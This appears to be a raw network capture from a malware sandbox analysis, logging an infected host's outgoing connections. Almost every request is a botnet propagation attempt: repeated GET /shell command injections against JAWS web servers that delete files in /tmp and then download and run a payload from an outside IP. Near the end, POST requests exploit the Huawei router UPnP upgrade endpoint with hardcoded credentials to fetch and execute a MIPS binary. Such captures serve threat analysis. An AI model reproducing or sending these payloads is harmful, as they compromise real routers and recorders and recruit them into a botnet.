                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            578192.168.2.135601012.216.25.5480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.245244980 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            579192.168.2.135683227.226.253.24980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.245858908 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            580192.168.2.1360392140.40.175.14680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.247308016 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            581192.168.2.1352852174.179.145.4980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.247957945 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            582192.168.2.1357952123.21.144.9280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.248692036 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            583192.168.2.1349594153.175.107.6080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.249310017 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            584192.168.2.134425466.136.9.14480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.250042915 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            585192.168.2.1333128160.15.119.24980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.250690937 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            586192.168.2.1342358100.127.78.3280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.251452923 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            587192.168.2.133971641.163.180.5580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.252100945 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            588192.168.2.1344368202.69.204.280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.252788067 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            589192.168.2.135653624.116.173.3380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.253865957 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            590192.168.2.133710835.202.251.1080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.254862070 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            591192.168.2.1336482103.129.186.13580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.255539894 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            592192.168.2.1357332169.89.191.12980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.256334066 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            593192.168.2.1351362139.221.66.1480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.257662058 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            594192.168.2.1358242107.69.148.13780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.258308887 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            595192.168.2.1336798217.134.158.5380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.258958101 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            596192.168.2.134870689.247.19.14580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.259701967 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            597192.168.2.1333388195.102.40.11080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.260368109 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            598192.168.2.134797237.23.114.280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.261107922 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            599192.168.2.1332990181.122.54.15880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.261737108 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            600192.168.2.1334602198.106.193.19180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.262402058 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            601192.168.2.1339616121.118.217.18380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.263057947 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            602192.168.2.135056623.71.76.23080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.263838053 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            603192.168.2.1344888193.68.253.2180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.264600039 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            604192.168.2.135704676.19.240.7580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.265343904 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            605192.168.2.1355132139.161.150.5980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.289047003 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            606192.168.2.1346446146.127.201.9380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.290843964 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            607192.168.2.134863857.149.234.22680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.293186903 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            608192.168.2.133702272.176.38.5280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.295761108 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            609192.168.2.1348660109.42.218.15780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.297539949 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            610192.168.2.1349900204.44.180.1080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.298942089 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            611192.168.2.1354578176.236.149.8480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.300493002 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            612192.168.2.134109061.254.239.18780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.301884890 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            613192.168.2.1352004211.227.251.9380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.303255081 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            614192.168.2.1337678148.136.36.10080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.304825068 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            615192.168.2.1358582221.232.64.18280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.306024075 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            616192.168.2.134250694.124.142.21480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.307423115 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            617192.168.2.1353204207.231.246.4980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.308830023 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            618192.168.2.1347818144.255.245.380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.310241938 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            619192.168.2.135476645.60.178.18080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.311646938 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            620192.168.2.1334228177.204.177.3780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.313323021 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            621192.168.2.1337140150.107.191.15880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.314721107 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            622192.168.2.1333330216.190.189.18580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.316251040 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            623192.168.2.1340720129.130.176.080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.317683935 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            624192.168.2.135268651.122.138.13380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.319024086 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            625192.168.2.1336680172.217.48.4980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.320455074 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            626192.168.2.1339382187.115.23.2780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.322474957 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            627192.168.2.1344934129.212.137.9780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.324002028 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            628192.168.2.1360416211.65.87.16680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.325383902 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            629192.168.2.13569608.62.18.14580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.326757908 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            630192.168.2.133456236.200.197.8480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.328277111 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            631192.168.2.1338160156.76.237.9737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.487616062 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            632192.168.2.1333812156.106.75.14237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.488250971 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
